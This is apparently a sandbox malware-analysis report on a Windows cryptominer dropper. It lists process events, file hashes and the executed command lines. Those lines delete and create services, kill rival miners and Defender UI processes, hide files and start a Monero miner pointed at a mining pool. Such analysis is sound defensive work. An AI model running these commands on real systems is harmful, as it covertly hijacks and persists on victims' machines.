Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2484 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "

C:\Windows\SysWOW64\sc.exe

sc delete Systemss

C:\Windows\SysWOW64\sc.exe

sc delete WMIserver

C:\Windows\SysWOW64\sc.exe

sc delete WMIservers

C:\Windows\SysWOW64\sc.exe

sc delete WMI

C:\Windows\SysWOW64\sc.exe

sc delete Serv

C:\Windows\SysWOW64\sc.exe

sc delete system_update

C:\Windows\SysWOW64\sc.exe

sc delete system_updatea

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im spoolsvs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im NsCpuapl.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSASCui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nheqminer_zcash.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nssm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im update.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im server.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sppscv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\net.exe

net stop wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wkde

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im mscorsvw.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im WUDFHost.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im nheqminer.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner32.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner64.exe /f

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\sc.exe

sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto

C:\Windows\SysWOW64\net.exe

net start wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wkde

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\svchost.exe

C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.minexmr.com udp

Files

C:\Windows\debug\wkde\wk.bat

MD5 816d97b2dca2af96209ef913291d59be
SHA1 a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256 ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA512 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

C:\Windows\debug\wkde\mscorsvw.exe

MD5 cbb4ca806e69a4880dd02e04e5bce18b
SHA1 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA256 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA512 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp

C:\WINDOWS\Debug\wkde\svchost.exe

MD5 79a1ec8d32e8e3032b5f5126c11f2216
SHA1 86dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256 d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512 a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp

C:\WINDOWS\Debug\wkde\mscorsvw.ini

MD5 d298cd48c88433017ef4e66af740830e
SHA1 e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256 b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA512 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

C:\WINDOWS\Debug\wkde\mscorsvw.log

MD5 df296d0aa6eb740c57059aa9f47fd46c
SHA1 de668e0436d036c2608b3a16fbfaaf3cbfd52a59
SHA256 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a
SHA512 db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5

memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp

memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp